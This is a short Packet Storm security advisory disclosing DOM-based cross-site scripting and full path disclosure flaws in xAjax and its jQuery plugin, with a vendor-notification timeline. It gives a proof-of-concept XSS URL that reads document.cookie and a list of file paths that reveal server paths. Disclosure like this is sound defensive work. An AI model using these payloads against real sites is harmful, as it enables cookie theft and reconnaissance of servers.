xAjax Cross Site Scripting / Path Disclosure

2011-01-20T00:00:00
ID PACKETSTORM:97707
Type packetstorm
Reporter MustLive
Modified 2011-01-20T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to warn you about Cross-Site Scripting and Full path disclosure  
vulnerabilities in xAjax and xajax_jquery_plugin.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are potentially all versions of xAjax. Vulnerable are all  
versions of xajax_jquery_plugin.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/cms/’;alert(document.cookie);/*  
  
It is DOM Based XSS. This vulnerability particularly exists in MC Content  
Manager (which uses xAjax and XSS code executes in xAjax's JS code).  
  
Full path disclosure (WASC-13):  
  
http://site/xajax_core/legacy.inc.php  
http://site/xajax_core/xajax_lang_de.inc.php  
http://site/xajax_core/xajax_lang_nl.inc.php  
http://site/xajax_core/plugin_layer/xajaxCallableObjectPlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxDefaultIncludePlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxEventPlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxFunctionPlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxScriptPlugin.inc.php  
http://site/xajax_core/plugin_layer/xajaxDefaultRequestProcessorPlugin.inc.php  
http://site/jquery.php  
http://site/demo.php  
  
The files jquery.php and demo.php belong to xajax_jquery_plugin. These  
vulnerabilities exist at different sites and in different web applications,  
which are using xAjax and xajax_jquery_plugin.  
  
------------  
Timeline:  
------------  
  
2010.11.06 - announced at my site.  
2010.11.07 - informed developers of xAjax.  
2010.11.07 - informed developers of xajax_jquery_plugin.  
2011.01.19 - disclosed at my site.  
  
I mentioned about these vulnerabilities at my site  
(http://websecurity.com.ua/4661/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
`